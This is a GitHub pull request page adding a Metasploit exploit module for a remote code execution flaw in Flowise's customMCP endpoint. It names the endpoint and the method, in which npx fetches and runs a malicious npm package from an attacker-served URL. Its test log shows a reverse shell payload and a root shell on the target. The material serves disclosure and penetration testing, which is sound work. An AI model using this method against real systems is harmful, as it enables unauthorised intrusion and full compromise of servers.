exploit/multi/http/flowise_mcp_rce: Add Flowise MCP Server RCE (CVE-2026-56274)#21616
Open
jafarov007 wants to merge 2 commits into
Open
exploit/multi/http/flowise_mcp_rce: Add Flowise MCP Server RCE (CVE-2026-56274)#21616jafarov007 wants to merge 2 commits into
jafarov007 wants to merge 2 commits into
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Description
Adds a new exploit module for CVE-2026-56274, a remote code execution
vulnerability in Flowise versions prior to 3.1.2.
The vulnerability exists in the /api/v1/node-load-method/customMCP endpoint,
which allows an authenticated attacker to execute arbitrary commands via a
malicious npm package served over HTTP and executed by npx.
Related Issue: N/A
Breaking Changes
None
Verification Steps
use exploit/multi/http/flowise_mcp_rcecheckto verify the target is vulnerableexploitto obtain a command shell session — expected output:whoamireturnsrootTest Evidence
msf exploit(multi/http/flowise_mcp_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(multi/http/flowise_mcp_rce) > run
[] Exploit running as background job 0.
[] Exploit completed, but no session was created.
msf exploit(multi/http/flowise_mcp_rce) >
[] Started reverse TCP handler on 192.168.x.x:4444
[] Building malicious npm package tar in memory...
[+] Tar package built in memory (3584 bytes)
[] Using URL: http://192.168.x.x:8000/msf.tar
[] Server started.
[] Authenticating as asdf@asf.asdf...
[+] Authentication successful
[] Sending malicious MCP node config (tar URL: http://192.168.x.x:8000/msf.tar)...
[+] 192.168.x.x flowise_mcp_rce - Serving malicious tar package to 192.168.x.x (GET /msf.tar)
[] Command shell session 1 opened (192.168.x.x:4444 -> 192.168.x.x:49926) at 2026-06-29 00:17:12 +0300
[!] Exploit request returned HTTP no response
sessions -i 1
[] Starting interaction with 1...
Shell Banner:
/bin/sh: can't access tty; job control turned off
/ #
/ # ls
a.out
bin
dev
etc
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
??H?B?????
/ # whoami
root
Environment
AI Usage Disclosure
None
Pre-Submission Checklist
documentation/modules